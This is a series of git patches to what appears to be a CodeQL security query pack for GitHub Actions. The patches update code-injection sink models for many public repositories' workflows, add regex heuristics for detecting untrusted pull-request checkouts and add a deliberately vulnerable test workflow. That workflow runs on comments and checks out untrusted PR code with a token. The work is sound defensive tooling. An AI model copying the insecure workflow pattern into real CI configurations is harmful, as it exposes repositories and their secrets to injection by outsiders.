c3642c84f63..adea8ae4bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 3e6691f0e8f..857c946e2b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 733c2e20a71..717022ea6e8 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index cb80f74e4e8..7dadb99209d 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index 0f78ea086a6..ca3cb0091e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", "code-injection", "generated"] \ No newline at end of file + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index e2bf8f96fa9..6faf8b90057 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 4a8500a147e..39b6773a2b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 3e362cebc58..cbbce950b41 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 9e5f6e3541e..48206551bcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 89fbb5dbf70..256ad3f0e04 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index f7ee9b66305..ae408b131e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel From d18c575cd4848c5b68d95f97ab3f8943a7a0ca1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:22:45 +0200 Subject: [PATCH 0178/1267] fix broken models --- .../apache_incubator-kie-tools.model.yml | 4 +-- .../streetsidesoftware_cspell.model.yml | 4 +-- ql/test/library-tests/test.expected | 35 +++++++++++++++++++ 3 files changed, 39 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 37f3efbeded..2e28ad9e900 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: summaryModel data: - - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 1f087287d25..70b2c362464 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -5,7 +5,7 @@ extensions: data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel + pack: githubsecuritylab/actions-all + extensible: summaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c08d4c824e1..8dfd57567d5 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -399,6 +399,7 @@ sources | dorny/paths-filter | * | output.changes | PR changed files | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | | jitterbit/get-changed-files | * | output.added | PR changed files | manual | | jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | | jitterbit/get-changed-files | * | output.all | PR changed files | manual | @@ -408,6 +409,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | | marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | | tj-actions/branch-names | * | output.current_branch | PR current branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | @@ -439,6 +441,7 @@ sources summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | @@ -452,14 +455,22 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | @@ -469,14 +480,29 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | | haya14busa/action-cond | * | input.if_false | output.value | taint | manual | | haya14busa/action-cond | * | input.if_true | output.value | taint | manual | | hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | @@ -484,13 +510,22 @@ summaries | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | From bd9cd3eb8680757845031da5e5837277a03a616b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:15:59 +0200 Subject: [PATCH 0179/1267] new untrusted checkout step --- ql/lib/ext/sergeysova_jq-action.model.yml | 7 +++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 21 ++++++++++++++++++- .../.github/workflows/untrusted_checkout2.yml | 19 +++++++++++++++++ 3 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 ql/lib/ext/sergeysova_jq-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml new file mode 100644 index 00000000000..8ab1d090b1c --- /dev/null +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] + diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 40f6d2fec9e..c9cbb0ab13c 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,7 +66,8 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" + // heuristics + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" ], _, _) ) } @@ -121,6 +122,24 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhCheckout extends PRHeadCheckoutStep instanceof Run { + GhCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + from Workflow w, PRHeadCheckoutStep checkout where w.isPrivileged() and diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml new file mode 100644 index 00000000000..d9e5d6be670 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -0,0 +1,19 @@ +on: issue_comment + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Get PR number + id: pr_number + if: ${{ github.event_name == 'issue_comment'}} + run: | + PR_URL="${{ github.event.issue.pull_request.url }}" + PR_NUMBER=${PR_URL##*/} + echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT + - name: Checkout Pull Request + if: github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} From afaab8b644e8b99a1d78f278afd7760a2b2f575a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:26:21 +0200 Subject: [PATCH 0180/1267] add tests --- ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index dc457c6a8a7..27f6bbca39c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,6 +18,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From d4d3957392a16149b6b7e59a9d66e022439d8f84 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:29:14 +0200 Subject: [PATCH 0181/1267] Create test.yml --- .github/workflows/test.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/workflows/test.yml diff --git 